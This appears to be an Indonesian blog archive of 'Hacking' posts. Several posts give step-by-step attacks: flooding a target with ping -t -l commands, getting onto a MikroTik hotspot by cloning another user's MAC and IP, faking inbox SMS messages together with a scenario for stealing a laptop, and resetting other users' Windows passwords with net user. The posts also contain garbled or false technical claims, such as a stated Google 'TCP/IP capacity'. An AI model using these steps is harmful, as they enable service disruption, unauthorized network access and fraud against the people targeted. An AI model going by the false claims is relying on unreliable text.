Promo

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

IDM untuk Firefox 9

firefox9-status-38377837486

Mozilla sebagai pengembang browser ternama Firefox di penghujung tahun 2011 meluncurkan versi 9.0 dan tidak lama kemudian melakukan update ke versi 9.0.1 Kelebihan dari Firefox 9 ini adalah peningkatan performa javascript dan tools sehingga browsing menjadi lebih cepat. Namun ada sedikit kekurangannya yaitu Plugin IDM yang tidak kompetibel dengan Firefox versi ini alhasil IDM tidak dapat bekerja pada browser versi baru besutan Mozilla ini, Mungkin banyak diantara kalian yang mengalami hal ini? Banyak jalan menuju ke Roma… agar IDM bisa kembali bekerja pada browser versi ini maka yang harus dilakukan adalah menginstall Plugin dari IDM versi CC 7.3.11 silahkan download

read

Cara Install Plugin:

Buka Browser Firefox Anda dan klik Tab File klik lagi Open File atau (Ctrl+O) arahkan ke folder dimana IDM CC 7.3.11 anda tersimpan, maka anda akan diminta untuk install plugin seperti gambar berikut:

IDM

Dan jika terdapat Notifikasi dari Firefox klik saja Allow, restart Firefox anda maka IDM sudah bisa digunakan pada Mozilla Firefox versi 9

Read more

Mengatasi Serangan DoS Pada Komputer

My-computer-256x256 Setelah membaca artikel sebelumnya DDoS Attack tidak lucu rasanya kalau komputer anda diserang juga. Inilah artikrl yang saya tulis untuk antisipasi hal itu terjadi. Selamat membaca

Denial-of-service (DoS). Dalam layanan-penolakan-(DoS), penyerang berupaya untuk mencegah pengguna yang sah mengakses informasi atau layanannya. Dengan penargetan komputer dan koneksi jaringan, penyerang mungkin dapat mencegah Anda dari mengakses email, website, rekening online (perbankan, dll), atau layanan lain pada komputer yang terkena dampak.

Jenis yang paling umum dan jelas serangan DoS terjadi ketika seorang penyerang “membanjiri” jaringan dengan informasi tertentu. Ketika Anda ketik sebuah URL untuk situs Web tertentu ke dalam browser, Anda akan mengirimkan permintaan ke server komputer untuk melihat halaman situs tersebut. Server hanya dapat memproses sejumlah permintaan sekaligus, jadi jika overloads permintaan tersebut tidak dapat diproses atau terjadi hambatan proses pengiriman informasi tersebut. Ini adalah penolakan “pelayanan” karena Anda tidak dapat mengakses situs tersebut.

Seorang penyerang dapat menggunakan pesan spam email untuk memulai serangan serupa pada account email Anda. Apakah Anda memiliki account email yang disediakan oleh Situs Anda atau melalui layanan gratis seperti Yahoo atau Hotmail, Anda akan diberi kuota tertentu, yang membatasi jumlah data yang Anda kirim maupun tampung. Dengan mengirim banyak pesan email, atau besar, untuk account email, penyerang bisa mengkonsumsi kuota Anda.

Kita Dapat Menolak Serangan DoS?

Dalam Daniel of Service (DoS) serangan, penyerang dapat menggunakan komputer Anda untuk menyerang komputer lain. Dengan mengambil keuntungan dari kerentanan keamanan atau kelemahan, penyerang bisa mengambil alih komputer Anda. Dia kemudian bisa memaksa komputer Anda untuk mengirim data dalam jumlah besar ke situs web atau mengirim spam ke alamat email tertentu. Serangan itu merupakan Distribution Danial os Service (DDoS) karena penyerang menggunakan beberapa komputer, termasuk Komputer Anda, untuk memulai serangan layanan.

 Bagaimana Anda menghindari menjadi bagian dari masalah?

Sayangnya, tidak ada cara yang benar-benar efektif untuk mencegah menjadi korban dari serangan DoS atau DDoS, tetapi ada langkah-langkah yang dapat dilakukan untuk mengurangi kemungkinan seorang penyerang akan menggunakan komputer Anda untuk menyerang komputer lain:
>> Instal dan memelihara perangkat lunak anti-virus.
>> Instal firewall, dan konfigurasikan untuk membatasi trafik yang masuk ke dan meninggalkan komputer.
>> Ikuti petunjuk keamanan yang baik untuk membagikan alamat email Anda. Menerapkan filter email yang dapat membantu Anda mengelola lalu lintas yang tidak diinginkan.

Bagaimana Anda tahu sebuah serangan terjadi?

Tidak semua gangguan layanan adalah hasil dari DoS. Mungkin ada masalah teknis dengan jaringan tertentu, atau sistem administrator dapat melakukan pemeliharaan. Namun, gejala berikut bisa menandakan serangan DoS atau DDoS:
>> Luar biasa, memperlambat kinerja jaringan (membuka file atau mengakses situs web)
>> Tidak tersedianya situs web tertentu
>> Ketidakmampuan untuk mengakses situs web apapun
>> Peningkatan dramatis jumlah spam yang Anda terima di account Anda

 Apa yang Anda lakukan jika Anda berpikir Anda mengalami serangan?

Bahkan jika Anda lakukan dengan benar mengidentifikasi serangan DoS atau DDoS, kemungkinan bahwa Anda akan dapat menentukan target yang sebenarnya atau sumber serangan. Hubungi teknis profesional yang sesuai untuk bantuan.
» Jika Anda melihat bahwa Anda tidak dapat mengakses file Anda sendiri atau mencapai situs web eksternal dari komputer kerja Anda, Hal ini dapat menunjukkan bahwa komputer Anda atau jaringan organisasi Anda sedang diserang.

» Matikan koneksi internet dari komputer.

» Masuk ke Registry komputer

1. HKEY_LOCAL_MACHINE
2. SOFTWARE
3. Microsoft
4. UPnP Device Host atau UPnP Control Point
5. Pada sisi sebelah kanan, klik kanan New - DWORD Value berikan nama DownloadScope dan beri nilai 3.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SSDPSRV\Parameters dan klik new - dword beri nama TTL lalu beri dengan nilai 30.

Restart komputer

Read more

DDoS Attack

My-computer-256x256 Masih ingat beberapa awal bulan ini,  layanan WordPress (WP) diserang oleh Hacker yang disinyalir dari China dengan menggunakan tehnik DDoS? Tidak tanggung-tanggung tiga server wordpress.com down yang berada di San Antonio, Dallas, dan Chicago ambruk yang menyebabkan jutaan pengguna layanan WP tidak dapat mengakses halaman WP. Bagaimana cara kerja DDoS?

Denial-of-service (DoS) adalah tehnik serangan yang sangat kuno, tehnik ini sering digunakan dikala kemajuan tehnologi IT belum secanggih ini, mungkin karena ke kunoannya itulah maka para IT luput mengawasi tehnik serangan ini. Untuk melakukan serangan dengan tehnik ini pertama kali harus mencari ip target server dan ketika ip sudah didapatkan langkah selanjutnya adalah mengirim data yang tidak terhitung jumlahnya ke server bersangkutan maka dijamin dalam waktu singkat server akan Down!!!

Langkah melakukan DDoS

Langkah Pertama lakukan ping ke alamat target untuk mendapatkan IP nya.

Langkah Kedua lakukan penambahan opsi l. Opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat besar sekali tentu hal ini akan sangat berbahaya, efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.
Penulisannya adalah dengan mengetikkan data di dalam CMD atau DOS :

Ping -l ip-address/domain-target <besar-buffer>

sebagai contoh untuk domain target :
Ping -l blabla.com 100000
Contoh untuk domain IP address target :
Ping -l 216.239.61.104 100000
Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000. Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )
Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.
Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :
Ping -t -l ip-address/domain-target <besar-buffer>

Langkah diatas adalah langkah serangan DoS, Bagaimana dengan DDoS atau Distribute Danial of Service? Untuk DDoS sama saja hanya yang melakukan serangan ke target bisa mencapai ratusan bahkan ribuan komputer dengan waktu yang bersamaan dan inilah yang dialami oleh WordPress.

Menurut Mat Mullenweg pendiri wordpress, serangan ini adalah serangan terbesar yang sebelumnya pernah terjadi pada enam tahun yang lalu, mungkin motif serangan ini yaitu politik untuk menghancurkan blog-blog yang tak berbahasa Inggris. Karena menurut pendiri wordpress tersebut sasaran serangan yaitu blog-blog yang menggunakan bahasa china, yang juga termasuk blog yang di blokir oleh situs pencari baidu di china.
Sementara serangan ini sendiri 92% berasal dari china, dan sisanya dari jepang dan korea, yang memanfaatkan zombie atau botnet untuk membanjiri trafik wordpress.com dalam beberapa Gigabits per detik dan mengirim jutaan paket perdetik hingga membuat server wordpress.com down.

Read more

Membuat Security Nama Komputer Pada Facebook

Hampir setiap hari kita mendengar dan membaca tentang PEMBAJAKAN ACCOUNT FACEBOOK dengan menggunakan keylogger, fake login, sniffing atau dengan cara lain, sekarang saatnya kita ambil alih account Facebook kita.

Di sini anda akan mencoba membuat sebuah pengamanan dengan cara setiap kali login akan memasukan nama computer dahulu, tujuannya? agar siapapun yang mencoba login ke account anda bisa di deteksi dengan nama computer, Apakah cara ini efisien ? tidak terlalu efisien, tapi cukup sebagai bukti jika ada orang lain ogin ke account kita tanpa seizing dari kita terlebih dahulu. Ikuti langkah-langkah berikut ini:

1. Login Ke account FB anda

2. Pilih  Account Setting

FB

 

 

 

 

 

 

 

 

 

 

 

3. Pada bagian  Keamanan Akun pilih ganti.

FB 2

Berikan tanda centang Ya pada “Anda ingin menerima pemberitahuan untuk login dari alat baru?” Lalu klik kirim… Sekarang coba logout dahulu, lalu coba login kembali. Saat mau masuk ke dalam facebook, ada permintaan pemberian nama computer.

FB 3

4. Simpan, maka kita akan masuk ke dalam account facebook… Sekarang coba cek email anda, akan ada pemberitahuan dari facebook.

FB 4

FB 5

Terlihat notifikasi ini sesuai dengan nama komputer yang kita masukkan, bila ada nama komputer lain yang mencoba login ke Account anda segeralah mengganti Password Facebook anda.

Read more

Hacking Hotspot Router Mikrotik

Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing.
Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.

Berikut langkah-langkahnya :

  • Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. 
  • Koneksikan komputer kita dengan hotspot mikrotik
  • Jalankan program Netcut
  • Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard

mikrotik hack 0

 

  • Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.

mikrotik hack 1

  • Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.

mikrotik hack 2

  • Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
  • Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C

mikrotik hack 3

  • Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.

mikrotik hack 6

Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all

  • Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.

mikrotik hack 7

Sebelum melakukan clone

mikrotik hack 8

Sesudah melakukan clone

Read more

Cek IP Address Pengirim E-mail

IP Address merupakan identitas unik untuk setiap komputer yang terhubung dalam jaringan, baik lokal maupun internet. Saat Anda melakukan koneksi ke internet maka ISP (Internet Service Provider) yang Anda pakai akan memberi anda IP Address (ip publik) secara otomatis (IP address tersebut berbeda dengan ip address untuk jaringn lokal Anda).

Untuk mengecek IP Address yang diberikan oleh ISP saat Anda melakukan koneksi ke internet, Anda bisa mengunjungi situs:

http://ip-adress.com/

Saat Anda membuka situs tersebut maka secara otomatis akan ditampilkan ip address, negara, kota ISP dan nama ISP yang Anda gunakan, contohnya seperti gambar di bawah ini:

Untitled

Contoh di atas adalah Alamat IP kita sendiri

Saat Anda membaca email mungkin hanya terlihat informasi date, to, cc, bcc, subject dan message. Padahal setiap email yang terkirim pasti menyertakan informasi yang lengkap seperti message id, mailer, ip address, dan sebagainya.

Kalau Anda ingin mengetahui ip address pengirim email beserta isp yang digunakan Anda bisa membaca tips berikut ini.

Untuk Yahoo Mail:

  1. Login ke Yahoo Mail.
  2. Pilih salah satu email yang ingin Anda cek.
  3. Klik pada menu atau link Full Header yang terletak di kanan bawah.
  4. Cari tulisan “Received: from [...] by”.
  5. Pada contoh di bawah ini IP addressnya adalah 118.137.25.98

E-mail

Untuk MS Outlook Express:

  1. Buka program Outlook Express.
  2. Klik kanan pada salah satu email yang ingin Anda cek.
  3. Klik menu Properties.
  4. Klik tab Detail.

Untuk Gmail / Google Mail.
1. Login ke account email anda ( gmail.com).
2. Masuk ke inbox
3. Buka salah satu email yang ingin anda lihat,
4. Lihat kanan di bagian atas ada pilihan Reply, terus disamping tulisan Reply ada tanda panah ke bawah, klik tanda panah tersebut dan pilih Show Original.
5. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Untuk Hotmail.
1. Login ke account email anda ( hotmail.com ).
2. Buka salah satu email yang ingin anda lihat
3. Klik kanan email tersebut dan pilih View Source.
4. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Untuk Microsoft Outlook.
1. Buka program Outlook Express dan login ke email anda.
2. Klik kanan pada salah satu email yang ingin anda lihat dan pilih Options
3. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Kalau Anda sudah mendapatkan informasi ip address selanjutnya Anda bisa mengecek ISP yang digunakan beserta kotanya

E-mail1

E-mail2

 

Read more

Serangan Denial of Service

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Denial Of Service atau DoS adalah jenis serangan yang bisa dikatakan tidak ada obatnya, Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti facebook.com  , twitter.com dan sebagainya.

Apa itu DoS?

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS:

  1. Mematikan Server
  2. Menyibukkan Server
    • Tanpa bug/vulnerability
    • Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

  • Ping of Death ( CA-1996-26 )

    Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.

  • MySQL IF Query DoS ( SA25188 )

    Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

  • Cisco Global Site Selector DNS Request Denial of Service (SA33429)

    Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:

  • Exploiting vulnerability: Menyerang dengan malicious request/packet
  • No vulnerability exploitation: Menyerang dengan normal request/packet

Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

  • TCP SYN Flood DoS

    Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

    Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.

  • Apache mod_deflate DoS

    Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

    Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.

ddos

Courtesy of: www.dos-attack.net

Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

  • Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
  • Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
    • Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
    • Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.
Read more

SMS Palsu di Inbox

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Memalsukan sms sebetulnya sudah lama ada, tapi melalui tulisan ini akan dibahas sedikit tentang kemungkinan yang akan terjadi bila ini disalah gunakan oleh pihak yang tidak bertanggung jawab, dengan membaca tulisan ini bukan maksud dari saya untuk membuat takut tapi kita bisa lebih ber hati-hati lagi dengan kemajuan tehnologi.

images Tidak banyak orang yang tahu bahwa sms yang berada di inbox bisa dibuat sendiri oleh pemilik hp, tanpa harus ada campur tangan orang lain. Hal ini mudah dilihat dari banyaknya orang yang percaya bahwa isi inbox adalah bukti kuat dan otentik bahwa orang lain telah mengirimkan sms padanya.

Bagaimana jika teman anda mengatakan bahwa si X telah mengirimkan sms bernada kurang ajar pada dia. Mungkin anda tidak percaya bukan? Bagaimana bila anda menemukan “bukti” sms dari X yang isinya memang bernada kurang ajar. Bagi orang awam isi sms ini adalah bukti yang sangat kuat, tak terbantahkan bahwa X benar-benar telah mengirimkan sms bernada kurang ajar, maka dari itu X perlu diberi pelajaran.

 

HP tidaklah berbeda dengan komputer, ada prosesor, memori, storage dan tentu saja sistem operasi. Sistem operasi hp yang banyak dikenal adalah Windows Mobile dan Symbian. inbox, sent, draft dsb juga kurang lebih seperti folder. Yang biasa dilakukan di hp adalah mengkopi/memindahkan message dari satu folder ke folder lainnya seperti dari draft ke sent atau dari inbox ke saved messages. Memang tidak ada menu untuk membuat sms dan menyimpannya di inbox. Namun bukan berarti tidak mungkin dilakukan, karena sebenarnya fungsi atau APInya di sistem operasi sudah tersedia. Tinggal dibuat programnya saja untuk melakukan itu. Program yang bisa membuat sms fake untuk HP Symbian adalah program Y-Fake. Cara instalasinya adalah, download dari drjukka.com/FakeMessages.html. Setelah didownload, extract file zipnya. Akan didapatkan file .SIS yang belum di-sign. Sebelum bisa diinstall di hp harus di-sign dulu di www.symbian-signed.com, pilih “Open Signed Online” kemudian isi formnya. Setelah didownload tinggal di-install di HP Symbian anda.

Cara pakainya gampang, bikin message baru, isi sender number dan sender name yang akan menjadi field From, kemudian isi pesannya dan jam kirim. Tunggu sampai jamnya tercapai akan ada sms masuk ke inbox. Cobalah bereksperimen untuk menggunakan bermacam-macam pengirim. Anda bisa coba nomor pendek 4 digit, alphanumeric, atau nomor panjang (biasanya perlu ditambahkan +62).

Kalau nama dan pengirim berbeda maka yang muncul di message detail adalah: Nama . Contoh: From: Rizki <+6281….> Kalau nama dan pengirim diisi sama, maka yang muncul hanya salah satunya saja tanpa kurung < > . Kalau ingin tampak sebagai nomor panjang, isikan dengan nomor yang sama di bagian nama maupun nomor misalkan +62813….. Kalau ingin tampak sebagai alphanumeric, maka isikan alphanumeric yang sama di bagian nama maupun nomor misalkan “INDOSAT”.

Cara ini sepenuhnya GRATIS, tidak perlu bayar apapun karena tidak hubungannya dengan koneksi jaringan apapun, semua dilakukan dalam hp sendiri secara local. Saya sudah coba dan test di E90 saya, hasilnya sangat memuaskan, tidak bisa dibedakan bahkan setelah membuka “Message Detail”.

Social Engineering Technique

Social engineering singkatnya adalah teknik merayu, membujuk dan menipu orang lain untuk keuntungan pelaku. Dengan fake sms ini teknik social engineering menjadi sangat efektif. Salah satu contoh skenarionya adalah:

Misalkan ada yang ingin mencuri laptop di sebuah rumah. Dia bisa membuat sms di inboxnya dengan From adalah nomor HP yang punya rumah, isinya misalkan: “Tolong bawa dan bersihkan laptop saya dari virus.” Si maling bisa dengan pede datang dan mengatakan ke pembantu di rumah bahwa dia adalah teknisi laptop. Sebagai buktinya dia tunjukkan hpnya yang di sana berisi sms dari yang punya rumah. Si pembantu yang sudah hapal betul nomor majikannya tentu saja percaya. “Oh iya ini nomor majikan saya, silakan masuk mas, saya bawakan laptopnya”.

Read more

Mengganti Password tanpa Login

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Sering kali kita menemukan User account (orang lain) yang  terpassword, terutama bila satu komputer yang dipakai bersama, sebelumnya saya juga sudah menulis tentang Lupa Password Windows nah disini akan dibahas cara merubah password user (orang lain) di Windows XP tanpa perlu login atau mengetahui password user tersebut.

Saya harap tips ini tidak digunakan untuk hal yang kurang baik. Seperti, mengintip data orang tanpa ijin atau bahkan mengambilnya tanpa ijin. Gunakanlah untuk hal yang baik. Misalnya jika Anda atau teman Anda lupa password Windows XP mereka. Tips ini bisa digunakan untuk mereset atau merubah password user Windows XP tersebut.

Sebagai catatan. Tips merubah password user lain di Windows XP ini bisa dilakukan jika Windows XP tersebut mempunyai lebih dari 1 (satu) user account. Selain itu, user account yang Anda gunakan untuk merubah password harus mempunyai hak administrator. Bagaimana jika hanya terdapat 1 (stau) user account saja? Berharaplah account Administrator yang dibuat secara otomatis pada saat instalasi Windows XP tidak terhapus atau diganti namanya. Jika tidak terhapus atau terganti namanya, Anda bisa menggunakan user administrator tersebut untuk melakukannya. Bagaimana cara memunculkan user Administrator tersebut? Silahkan dibaca pada artikel saya yang berjudul User Administrator di Windows XP

Jika semuanya sudah siap, berikut cara mengganti password user lain di Windows XP:
Melihat semua user account yang ada di windows XP
Sebelum Anda merubah password sebuah user account, ada baiknya Anda melihat nama user yang ada pada Windows XP tersebut. Tujuannya yaitu mengetahui dengan tepat nama user yang akan Anda rubah passwordnya. Agar meminimallisir kesalahan. Untuk melihat nama-nama user di Windows XP, lakukan langkah-langkah berikut:

  1. Klik Start »» Run. Ketik “cmd” (tanpa tanda petik) dan tekan Enter, untuk membuka Command Prompt.
  2. Pada jendela Command Prompt, ketik perintah “net users” (tanpa tanda petik) kemudian tekan Enter.

1

Peintah CMD tadi berfungsi untuk menampilkan seluruh user account yang Anda pada komputer Windows XP. Sekarang ingatlah atau catat nama user yang akan Anda ganti passwordnya.

Mengganti/Merubah Password User Lain di Windows XP
Setelah nama user Anda ketahui, kini saatnya merubah password dari user tersebut. Caranya sebagai berikut:

  1. Masih dijendela Command Prompt, ketik perintah dengan format net user Username (nama user) *. Contohnya, username (nama user) adalah Anto. Jadi perintahnya adalah net user Anto *. Namun jika username menggunakan spasi, misalnya Mr Anto, maka username harus ditambahkan tanda petik. Hingga perintahnya menjadi net user “Mr Adit” *. Tekan Enter untuk melanjutkan.
